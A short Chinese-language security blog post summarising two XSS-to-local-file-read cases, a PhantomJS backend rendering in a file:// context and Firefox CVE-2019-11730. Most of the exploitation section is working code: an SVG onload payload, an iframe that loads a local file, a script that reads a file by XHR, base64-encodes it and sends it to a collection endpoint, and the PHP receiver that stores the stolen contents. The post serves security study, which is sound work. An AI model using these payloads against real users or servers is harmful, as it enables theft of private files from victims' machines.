目录

images

最近在总结XSS相关的内容,记录一下最近看到的两个比较有趣的案例。

案例

案例一、后端 PhantomJS 导致的文件读取

参考: https://xz.aliyun.com/t/127

利用过程:

  1. 后端使用PhantomJS来生成页面,生成好了会截图。(上下文为file://)
  2. 业务存在一个xss
  3. 通过XHR读取本地文件

案例二、CVE-2019-11730 导致的文件读取

参考:CVE-2019-11730 分析&小谈

当用户把带有payload的页面保存到本地并用漏洞对于的firefox打开,就可以读取本地的任意文件。

利用

获取上下文环境:

1
<svg/onload="document.write(window.location)">

案例一中,本身是同源的,所以可以使用iframe直接读取本地文件

1
<iframe src=file:///C:/Users/ThreeZhi/Desktop/test.txt></iframe>

简单读取文件:

1
2
3
4
5
6
7
8
9
10
11
12
<script>
function reqListener () {
var b64 = btoa(this.responseText);
var request = new XMLHttpRequest();
request.open('GET', 'http://127.0.0.1/getfile.php?file='+b64, true);
request.send();
}
var oReq = new XMLHttpRequest();
oReq.addEventListener("load", reqListener);
oReq.open("GET", "file:///C:/Users/ThreeZhi/Desktop/test.txt");
oReq.send();
</script>

接收文件 (要设置CORS头)

1
2
3
4
5
6
7
<?php
header("Access-Control-Allow-Origin: *");
$file = $_GET['file'];
$fp = fopen('file.txt', 'a+');
fwrite($fp, $file."\r\n\r\n");
fclose($fp);
?>

比较完善的payload:https://github.com/alidnf/CVE-2019-11730/blob/master/poc.html